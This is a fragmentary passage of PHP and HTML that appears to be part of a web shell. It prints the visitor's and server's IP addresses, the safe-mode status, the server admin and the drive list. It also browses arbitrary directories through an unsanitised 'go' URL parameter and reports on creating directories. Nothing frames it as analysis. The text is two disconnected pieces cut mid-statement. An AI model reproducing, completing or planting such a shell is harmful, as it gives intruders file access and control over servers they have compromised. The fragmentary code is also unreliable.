?> <br /> Your IP : <?php getClientIp(); ?> <font color="silver" >|</font> Server IP : <?php getServerIp(); ?> <br /> Safe Mode : <?php getSafeMode(); ?> <br /> <?php if ($os == 'Windows') { echo showDrives(); } ?> <?php echo getcwd(); ?> </div> </td> </tr> </tbody> </table> <div class="header" id="borders"> Server ADMIN: <?php echo $_SERVER['SERVER_ADMIN']; ?> <font color="silver" >|</font>
echo ' <font color="#b0b000">Directory created</font><br><br>'; } else { echo ' <font color="red">Problem creating directory</font><br><br>'; } } } } } $self = $_SERVER['PHP_SELF']; $dir = getcwd(); if (isset($_GET['go'])) { $dir = $_GET['go']; } if (is_dir($dir)) { $handle = opendir($dir); showDrives(); ?> <br><br> <b class="teke"><a style="color:#009900" href="<?php echo $_SERVER['PHP_SELF'] . '?action=mumpet&go=' . getcwd(); ?> /../"> back </a></b> <b class="teke"><a id="teke" style="color:#009900" href="<?php echo $_SERVER['HTTP_REFERER']; ?> "> forward </a></b> <br><br> <?php if ($dir[strlen($dir) - 1] != '/') { $dir = $dir . '/'; } while (($file = readdir($handle)) != false) { if ($file != "." && $file != "..") {